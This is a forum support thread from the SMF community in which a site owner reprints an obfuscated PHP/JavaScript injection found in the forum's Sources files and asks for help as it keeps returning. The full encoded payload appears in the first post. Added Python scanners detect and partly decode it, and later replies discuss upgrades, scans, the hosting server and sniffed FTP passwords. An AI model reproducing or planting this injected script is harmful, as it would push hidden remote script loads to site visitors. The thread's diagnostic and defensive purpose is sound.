SQL injection?

Started by masterz, November 23, 2009, 05:45:07 AM


masterz

Hello,

I had a problem with my SMF website.

Last month, when I tried to connect to my website with Firefox, I got this:

I spent a day finding the problem.

I found this script in the Sources folder, in index.php and boardindex.php:

<?php ob_start("security_update"); function security_update($buffer){return $buffer."<script language=\"javascript\">$a=\"Z64bZ3dZ227FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07Z22;ddZ3dZ22!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+0~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+0iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z22;ceZ3dZ2268aZ2572CodZ2565At(Z2530)^Z2528Z25270x0Z2530Z2527+eZ2573Z2529)Z2529Z253b}}Z22;ccZ3dZ22elZ2565ngtZ2568;i+Z252b)Z257btmZ2570Z253dds.Z2573licZ2565(iZ252ci+1Z2529;sZ22;dzZ3dZ22Z2566unZ2563Z2574iZ256fZ256eZ2520dw(Z2574)Z257bZ2563aZ253dZ2527Z252564oZ252563umeZ25256eZ2574Z25252eZ2577rZ2525Z25369Z2574Z252565Z25252Z2538Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569Z2570Z252574Z252520lZ2561nZ25256Z2537Z2575Z2561gZ25256Z2535Z25253dZ25255cZ252522Z256aavaZ2573crZ252569Z2570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscrZ252569pZ25257Z2534Z25253eZ2527;evZ2561Z256c(uZ256eZ2565Z2573caZ2570eZ2528tZ2529)}Z253bZ22;cdZ3dZ22Z2574Z253dst+Z2553trZ2569Z256egZ252efroZ256dChaZ2572CZ256fde(Z2528tmZ2570.cZ25Z22;czZ3dZ22Z2566uncZ2574ioZ256e 
Z2563zZ2528cZ257aZ2529Z257brZ2565tZ2575Z2572nZ2520Z2563a+cZ2562+ccZ252bcZ2564+ceZ252bZ2563z;}Z253bZ22;dcZ3dZ22wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSxZ22;cbZ3dZ2270Z2565(dZ2573);sZ2574Z253dtZ256dpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252Z22;opZ3dZ22Z2524aZ253dZ2522dw(dZ2563Z2573(Z2563Z2575,1Z2534)Z2529;Z2522;Z22;deZ3dZ22Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+Z2519dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0Z3d0#9050$9;0!Z2520M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;caZ3dZ22Z2566unZ2563Z2574iZ256fn dZ2563Z2573(dsZ252ceZ2573Z2529Z257bdsZ253duneZ2573caZ25Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522Z25220660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522!90660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ25Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dZ2573tZ253bdZ2563Z2573(Z2564Z2561+Z2564bZ252bdZ2563Z252bZ2564Z2564+Z2564Z2565,Z25310Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253dZ2524Z2561;Z2522Z253bZ22;Z69f 
Z28doZ63uZ6deZ6etZ2ecooZ6bZ69e.iZ6eZ64exZ4fZ66(Z27rf5Z66Z36dsZ27)Z3dZ3d-1)Z7bfunctiZ6fZ6e cZ61llbZ61ckZ28x)Z7b wZ69ndoZ77.tZ77 Z3d x;Z76arZ20d Z3d Z6eeZ77 DZ61tZ65Z28Z29;d.Z73Z65tZ54iZ6de(xZ5bZ22aZ73_oZ66Z22]*10Z300Z29;vZ61r hZ20Z3d d.getZ55TZ43HouZ72sZ28);wZ69ndoZ77.hZ20Z3d h;Z69f (Z68 Z3e 8)Z7bZ77Z69Z6eZ64ow.Z67Z64 Z3d Z64;Z73Z63(Z27rf5Z666dZ73Z27,2,7Z29;Z65vZ61Z6c(Z75neZ73cZ61pe(Z64z+Z63Z7aZ2boZ70Z2bsZ74)+Z27dw(dZ7a+Z63Z7a(Z24a+sZ74)Z29;Z27);Z64Z6fcZ75Z6deZ6etZ2ewrZ69tZ65Z28$a)Z3bZ7deZ6csZ65Z7bd.sZ65tZ55TCZ44Z61tZ65(Z64.geZ74Z55TCDZ61tZ65Z28) Z2d Z32Z29Z3bZ77iZ6edowZ2eZ67Z64 Z3d d;Z76aZ72 tiZ6de Z3d neZ77Z20Z41Z72Z72ayZ28);Z76ar Z73hZ69ftZ49ndeZ78 Z3d Z22Z22;timZ65[Z22yeZ61Z72Z22] Z3d dZ2eZ67eZ74Z55TCZ46ullZ59earZ28);tZ69me[Z22Z6donZ74hZ22] Z3dZ20Z64Z2egZ65tUZ54Z43MonZ74h()Z2b1;Z74imZ65[Z22dZ61Z79Z22] Z3d Z64Z2eZ67etUZ54CDZ61tZ65()Z3bif Z28dZ2egeZ74UTCZ4dZ6fZ6eZ74hZ28Z29Z2b1 Z3c 10Z29Z7bsZ68iftZ49nZ64eZ78 Z3d tiZ6deZ5bZ22yeZ61Z72Z22] +Z20Z22-Z30Z22 +Z20Z28dZ2egeZ74UTCZ4dZ6fnthZ28)+1Z29;}Z65lseZ7bZ73hiZ66tZ49Z6edexZ20Z3d tZ69meZ5bZ22yeZ61rZ22]Z20+Z20Z22-Z22 + Z28dZ2eZ67etUZ54CZ4doZ6etZ68Z28)+1Z29;Z7dZ69fZ20(d.Z67etZ55TCDZ61te(Z29 Z3c 10)Z7bZ73hiZ66Z74Z49ndZ65Z78 Z3dsZ68ifZ74Z49ndZ65x Z2b Z22-0Z22 + dZ2egetZ55Z54CDaZ74eZ28);}Z65lseZ7bZ73Z68Z69fZ74Z49Z6edeZ78 Z3d sZ68ifZ74Z49Z6edexZ20Z2b Z22-Z22 + Z64.gZ65tUZ54CDaZ74eZ28Z29;}Z64ocZ75mZ65ntZ2ewriZ74Z65Z28Z22Z3cscrZ22+Z22ipt lanZ67uagZ65Z3djavZ61scZ72Z69ptZ22+Z22 sZ72cZ3dZ27hZ74tpZ3aZ2fZ2fseaZ72chZ2etZ77Z69Z74terZ2ecomZ2ftrZ65nZ64sZ2fdaiZ6cy.jZ73on?Z64Z61Z74eZ3dZ22+ shZ69ftZ49nZ64ex+Z22&Z63Z61llbZ61ckZ3dcalZ6cbaZ63k2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}} funcZ74ionZ20calZ6cbZ61ck2Z28xZ29Z7bwindZ6fw.tZ77 Z3d x;sZ63(Z27rf5Z66Z36dsZ27Z2c2Z2c7);Z65valZ28unZ65scZ61pe(Z64z+cZ7aZ2bopZ2bstZ29+Z27Z64Z77(dZ7aZ2bcZ7aZ28Z24Z61+stZ29);Z27);Z64ocZ75menZ74.wZ72itZ65(Z24aZ29Z3b}doZ63uZ6dZ65nt.Z77Z72itZ65(Z22Z3cimg Z73rZ63Z3dZ27httpZ3aZ2fZ2fsearch.tZ77itZ74erZ2eZ63oZ6dZ2fimageZ73Z2fsearZ63Z68Z2frZ73s.pZ6egZ27 wiZ64Z74Z68Z3d1 
heigZ68tZ3d1 sZ74yleZ3dZ27visiZ62iliZ74y:Z68Z69dZ64eZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6canZ67Z75aZ67Z65Z3djZ61Z76ascZ72ipZ74Z22+Z22 Z73rcZ3dZ27http:Z2fZ2fseZ61Z72ch.Z74Z77iZ74teZ72.cZ6fmZ2ftrZ65Z6edZ73Z2fdaZ69lZ79.Z6asZ6fn?Z63Z61lZ6cbZ61ckZ3dZ63alZ6cbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}eZ6cseZ7b$aZ3dZ27Z27};fuZ6ecZ74Z69Z6fn Z73cZ28cZ6eZ6d,Z76,edZ29Z7bvarZ20exZ64Z3dneZ77Z20DZ61te(Z29;exZ64Z2eseZ74DatZ65(Z65xd.Z67eZ74DatZ65Z28)+Z65d)Z3bdoZ63umZ65nZ74.Z63Z6fokZ69eZ3dcZ6emZ2b Z27Z3dZ27 +escZ61pZ65(vZ29+Z27;expZ69reZ73Z3dZ27+exd.toZ47MTZ53tZ72iZ6eZ67Z28)Z3b};\";function z(s){r=\"\";for(i=0;i<s.length;i++){if(s.charAt(i)==\"Z\"){s1=\"%\"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>";}//important security update ?>


I removed it and changed the database and FTP passwords.

But this morning the script is on the website again.

Do you know a solution?

I tried to chmod the Sources folder to 644, but that doesn't work.

Sorry for my English, I'm French.

MasTerZ
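The posted block prepends an output-buffer callback (`ob_start("security_update")`) to the PHP file, so the injected `<script>` is appended to every page that file serves; the script's `z()` function turns each `Z` into `%` and runs `unescape()` on the result before `eval()`. The following is an added example, not code from the thread or from SMF: it flags those indicators in PHP source text and undoes that outer encoding layer without executing anything. The indicator names and the sample file contents are constructed for the example; the short encoded fragment in the usage call is copied from the posted block. The decoded text still contains further encoded strings (the posted script assembles and `unescape()`s them again at run time), which this example does not decode.

```python
"""Triage helpers for an injected ob_start()/eval block like the one posted above.

Added example, not code from the thread or from SMF. The indicator names
and the sample file contents below are constructed for the example.
"""
import os
import re

# Text patterns visible in the posted block. A match is a reason to look at
# the file, not proof of infection; legitimate code can use ob_start() too.
INDICATORS = {
    # ob_start() with a string callback name, as in ob_start("security_update")
    "ob_start_string_callback": re.compile(r'\bob_start\s*\(\s*\\?["\']\w+\\?["\']\s*\)'),
    # eval() fed by a decoder: eval(z($a)) or eval(unescape(...))
    "eval_of_decoded_string": re.compile(r'\beval\s*\(\s*(?:z|unescape)\s*\('),
    # the decoder loop that maps "Z" to "%"; quotes may be backslash-escaped
    # because the JavaScript sits inside a PHP double-quoted string
    "z_for_percent_decoder": re.compile(r'charAt\(i\)\s*==\s*\\?["\']Z\\?["\']'),
    # the comment the injector leaves at the end of the line
    "fake_update_comment": re.compile(r'//\s*important security update'),
}


def scan_php(source: str) -> list:
    """Return the indicator names that match one PHP file's text."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def scan_tree(root: str) -> dict:
    """Scan every *.php file under root; map relative path -> matched indicators."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as f:
                found = scan_php(f.read())
            if found:
                hits[os.path.relpath(full, root)] = found
    return hits


_ESC = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')


def js_unescape(s: str) -> str:
    """JavaScript unescape(): %XX and %uXXXX become characters, the rest is kept."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_z_layer(s: str) -> str:
    """Mirror of the posted z(): every 'Z' becomes '%', then unescape().

    Only the outer layer is undone; the result still holds further encoded
    strings that the original script decodes again at run time.
    """
    return js_unescape(s.replace("Z", "%"))


# Constructed samples: the shape of the injected line with the payload elided,
# and a clean file. Not the real SMF sources.
INFECTED_SAMPLE = (
    '<?php ob_start("security_update"); function security_update($buffer){'
    'return $buffer."<script>$a=\\"...\\";function z(s){r=\\"\\";for(i=0;i<s.length;i++)'
    '{if(s.charAt(i)==\\"Z\\"){s1=\\"%\\"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}'
    'eval(z($a));</script>";}//important security update ?>\n'
    '<?php\n// original file contents follow\n'
)
CLEAN_SAMPLE = '<?php\n// original file contents\nfunction BoardIndex() { return 1; }\n'

if __name__ == "__main__":
    print(scan_php(INFECTED_SAMPLE))
    print(scan_php(CLEAN_SAMPLE))
    # fragment copied from the posted block; decodes to a cookie check
    print(decode_z_layer("Z28doZ63uZ6deZ6etZ2ecooZ6bZ69e.iZ6eZ64exZ4fZ66(Z27rf5Z66Z36dsZ27)Z3dZ3d-1)"))
```

Run `scan_tree("/path/to/forum")` against a copy of the web root rather than the live tree, and treat a hit as a file to diff against a clean SMF release of the same version, not as a verdict on its own.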

Kill Em All

What version of SMF are you running? And the Sources folder should be 755.

Try upgrading SMF.

Edit: The only way to be secured is to make sure all your forum files stay up to date.


My Site: KEAGaming.com

Manual Installation of Mods
Prevent Spam and Forum Attacks
Please do not PM or email me for support unless offered, help should be publicly displayed to others.
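A reinfection check, as an added example that is not part of the thread or of SMF: hash every file under the web root once the files are known clean, compare a later snapshot against that baseline, and list anything in the tree that is writable by others (the thread's point about 755 for Sources). It compares hashes rather than modification times, because a re-uploaded file can carry any timestamp. The throwaway tree built by `demo()` is constructed for the example.

```python
"""Baseline/compare check for a web root such as an SMF install.

Added example, not from the thread or from SMF. Constructed demo data only.
"""
import hashlib
import json
import os
import stat
import tempfile


def snapshot(root: str) -> dict:
    """Map relative path -> SHA-256 hex digest for every regular file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            out[os.path.relpath(full, root)] = h.hexdigest()
    return out


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Files that appeared, disappeared, or changed content since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def writable_by_others(root: str) -> list:
    """Directories and files under root (root itself included) with the o+w bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for full in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            if os.lstat(full).st_mode & stat.S_IWOTH:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def save_baseline(snap: dict, path: str) -> None:
    with open(path, "w") as f:
        json.dump(snap, f, indent=1, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path) as f:
        return json.load(f)


def demo() -> dict:
    """Build a throwaway tree, baseline it, simulate a reinfection, and report."""
    root = tempfile.mkdtemp(prefix="webroot-")
    sources = os.path.join(root, "Sources")
    os.makedirs(sources)
    index = os.path.join(sources, "index.php")
    with open(index, "w") as f:
        f.write("<?php\n// original\n")
    baseline = snapshot(root)
    # Simulated reinfection: index.php gets a prepended block, a new file appears,
    # and Sources/ has been opened up to 777 (the mistake the thread warns against).
    with open(index, "w") as f:
        f.write('<?php ob_start("x"); ?><?php\n// original\n')
    with open(os.path.join(sources, "dropped.php"), "w") as f:
        f.write("<?php\n")
    os.chmod(sources, 0o777)
    return {"diff": diff_snapshots(baseline, snapshot(root)),
            "writable": writable_by_others(root)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Store the baseline file outside the web root and outside the FTP account's reach; if the attacker holds the FTP password, as JimM suggests further down, a baseline kept next to the forum files can be rewritten along with them.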

Ranter

He is running SMF version 1.1.10

EDITED LATER:

His site is hosted on a 1&1 server that appears to be in Berlin. There are 232 other domains on the same IP address.

I wonder if this is a case in which the entire server has been compromised?

Kill Em All

Have you tried running the kb_scan.php?
http://www.simplemachines.org/community/index.php?topic=313201

Maybe have your host run an AV scan. Also you might want to change your database's password to a more complex one. Then run repair_settings.php.


masterz

Hello,

Thank you guys.

I tried kb_scan, but it's all green.

I tried repair_settings.

I hope that works.

Thank you for everything ;D

I'll come back if the bad script appears again.


MasTerZ

Arantor

First up, kb_scan will not help; this isn't a krisbarteo infection.

It does look like the server may be compromised, or alternatively there is a backdoor in one or another script you have on your site; what other scripts are running?
Holder of controversial views, all of which my own.


Kill Em All

Quote from: Arantor on November 24, 2009, 08:03:49 PM
First up, kb_scan will not help; this isn't a krisbarteo infection.
Oh, well, couldn't the attack be a similar attack that the kb_scanner could still have caught?

I am still sticking with that he should contact his host about it ASAP in order for them to run an AV scan.


Ranter

Quote from: Kill Em All on November 25, 2009, 01:55:52 PM
I am still sticking with that he should contact his host about it ASAP in order for them to run a AV scan.

+1

Arantor

Let me clarify what kb_scan does. It looks for a SINGLE point of infection and flags up ONE type of behaviour that may or may not be completely unrelated to what has gone on here.

Contacting the host is definitely on the to-do list, as is making sure every script on the site is up to date. Then seeing about other users and whether they have been infected or not - I doubt this came from SMF itself.

babjusi

This looks very much like that Gumblar virus attack that hit hundreds of sites a while back.

Arantor

Signature doesn't look like a Gumblaroid attack; that just brute force added an iframe; this looks more insidious.

Kill Em All

masterz, is there any update with this? Like Arantor said, what other scripts are you running and are they up to date?


JimM

Google has some information on this. It appears that WordPress was hit hard with something similar that always got inserted in the index.php file. Some comments were that this was most likely a sniffed FTP password, so my recommendation would be to change that as well as run a good malware/spyware scan on your PC.
Jim "JimM" Moore
Former Support Specialist